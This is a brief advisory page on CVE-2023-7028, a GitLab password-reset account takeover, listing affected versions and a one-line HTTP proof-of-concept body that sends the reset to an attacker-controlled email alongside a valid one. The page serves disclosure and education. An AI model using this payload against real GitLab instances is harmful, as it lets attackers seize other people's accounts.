CVE-2023-7028

Tracked as CVE-2023-7028, the vulnerability has received a maximum CVSS score of 10.0 and enables account takeover through password reset emails sent to unverified addresses. It impacts self-managed GitLab Community Edition (CE) and Enterprise Edition (EE) instances across these versions:

16.1 prior to 16.1.6
16.2 prior to 16.2.9
16.3 prior to 16.3.7
16.4 prior to 16.4.5
16.5 prior to 16.5.6
16.6 prior to 16.6.4
16.7 prior to 16.7.2

Proof of Concept

N/AHTTP

user[email][]=valid@email.com&user[email][]=attacker@email.com

Disclaimer

All content published on exploit.se is intended strictly for educational and informational purposes. Research is conducted responsibly under coordinated disclosure principles.

Techniques, tools, and writeups shared on this site are meant to advance the security community's understanding of vulnerabilities and defences. They are not intended to encourage or enable unauthorised access to any system.

The author bears no responsibility for any misuse of information presented here.

Cookie Settings

This site does not use cookies, analytics, or any third-party tracking technologies.

No personal data is collected. No fingerprinting. No ads. You are not the product.


 ██╗ ██████╗ ███████╗██╗███████╗███╗   ██╗██████╗
 ██║██╔═══██╗██╔════╝██║██╔════╝████╗  ██║██╔══██╗
 ██║██║   ██║█████╗  ██║█████╗  ██╔██╗ ██║██║  ██║
 ██║██║   ██║██╔══╝  ██║██╔══╝  ██║╚██╗██║██║  ██║
 ██║╚██████╔╝██║     ██║███████╗██║ ╚████║██████╔╝
 ╚═╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚═╝  ╚═══╝╚═════╝

You found me.

↑↑↓↓←→←→ B A · click to close